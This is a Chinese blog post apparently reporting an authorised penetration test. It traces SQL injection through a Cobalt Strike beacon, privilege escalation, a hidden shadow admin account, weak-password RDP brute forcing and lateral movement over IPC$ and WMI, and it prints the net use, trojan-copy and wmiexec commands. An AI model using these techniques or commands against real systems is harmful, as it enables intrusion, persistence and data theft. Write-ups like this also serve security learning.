!
也想出现在这里? 联系我们
创意广告

安服仔某渗透项目实战

前言
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
一、漏洞挖掘
由于是做项目客户大大会直接将测试系统甩过来,所以这里就不过多介绍信息收集了,直接开始日
我的方法的话通过AWVS+人工渗透来进行测试
通过1-2小时的扫描发现Sql注入漏洞,此时我们来进行人工复现,首先呢先访问漏洞url,然后通过bp抓包,抓包如下:

poc:
POST /xxx/xxxx/login.aspx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://xxx.xxx.com:7699/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate,br
Content-Length: 58
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive
pwd=&userno=59s45qhepwd=&userno=59s45qhe

可以得知这个数据包呢是一处登录口的数据包但是访问的话不能正常访问,但是AWVS爆漏洞我们还是老老实实将数据包保存跑一下Sqlmap,Sqlmap测试结果如下:
图片[1]-安服仔某渗透项目实战-安全小天地
图 1-1 Sql注入DBA
测试结果对方未mssql数据库+Windows操作系统+asp.net站点,且为DBA权限,主要为DBA权限的话我们的操作空间就会很大了,接下来讲解内网渗透
二、内网渗透
通过图 1-1得知对方未DBA权限这里直接获取对方的os-shell以此来执行powershell命令以此上线cs
图片[2]-安服仔某渗透项目实战-安全小天地
图 2-1 Sql注入命令执行
执行之后成果上线,由于通过信息收集发现对方只打了5个补丁,且杀毒检测也是关闭的,这里的话我就直接进行了提权
图片[3]-安服仔某渗透项目实战-安全小天地
图 2-2 上线CS
提权完之后我们在进行信息收集以及密码抓取,由于探测对方为win2016 系统因此抓不到明文密码因此我这里添加影子用户admin$/admin@123../,做内网socks代理进行远程连接,这里做端口转发的话容易被发现所以我是直接通过对方的网络进行连接,也有一定的隐蔽性
图片[4]-安服仔某渗透项目实战-安全小天地
图 2-3 172.16.0.188服务器
接着利用此用户做了简简单单权限维持后,将内网神器fscan上传至服务器隐藏文件夹进行扫描,成功通过弱口令拿下大量机器,由于机器太多我这里就直接贴cs上线的截图以及部分机器截图了
通过内网扫描工具爆破rdp获取的机器如下:
弱口令都为:administrator/123456
图片[5]-安服仔某渗透项目实战-安全小天地
图 2-4 172.16.0.175服务器
图片[6]-安服仔某渗透项目实战-安全小天地
图 2-5 172.16.4.19个人PC
图片[7]-安服仔某渗透项目实战-安全小天地
图 2-6 172.16.7.39个人PC
这里由于机器过多所以这里就只贴三张图了,rdp弱口令拿下将近12台主机
接下来就是通过内网的ipc共享加wmi以及加壳免杀上线CS,如下:
这里不直接用ipc横向的原因就是在创计划任务时提示拒绝访问,自我猜测被360天擎拦截,然后将ipc和wmi组合用的原因呢就是wmi需要将后门上传web服务器,但是这样很容易被发现,ipc传马的话只需建立连接直接传马加上wmi直接进行执行在connect连接即可
这里利用的前提条件的话需要指导对方的一个账号密码且对方要开启共享以及135端口,这里通过爆破的话也是获取到了大量机器的账号密码都为:administrator/123456
接着将其上线如下:
图片[8]-安服仔某渗透项目实战-安全小天地
图片[9]-安服仔某渗透项目实战-安全小天地
图 2-7-8 主机上线图
图片[10]-安服仔某渗透项目实战-安全小天地
图 2-9 横向移动
ipc:
net use \ip\ipc$ 密码 /user:用户名 \进行ipc连接
copy 某盘符木马 \ip\c$ \将拿到的服务器的木马传至对方的c盘
wmi:wmiexec ./administrator:admin!@#45@ip “cmd.exe /c c:/beacon.exe” \执行传在c盘木马
机器权限拿的差不多了在贴一张FTP吧
FTP:弱口令:admin/admin
文件预估有一万以上,预计是FTP服务器来的存储了大量文件
图片[11]-安服仔某渗透项目实战-安全小天地
图 2-10 FTP
至此渗透结束、总结拿到的机器权限40多台、FTP权限上百个。由于授权测试时间只给了两天,不然足够有时间拿到域控以及进入工控网等
结束语
其实每次渗透测试实战时每个环境都不一样,这里给各位师傅一句建议就是每次做渗透时要么写一份语雀要么将报告保存好,这样有助于增长我们的实战经验忘了也可以返回去看自己的骚姿势。在此感谢各位师傅观看!Thank you!

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容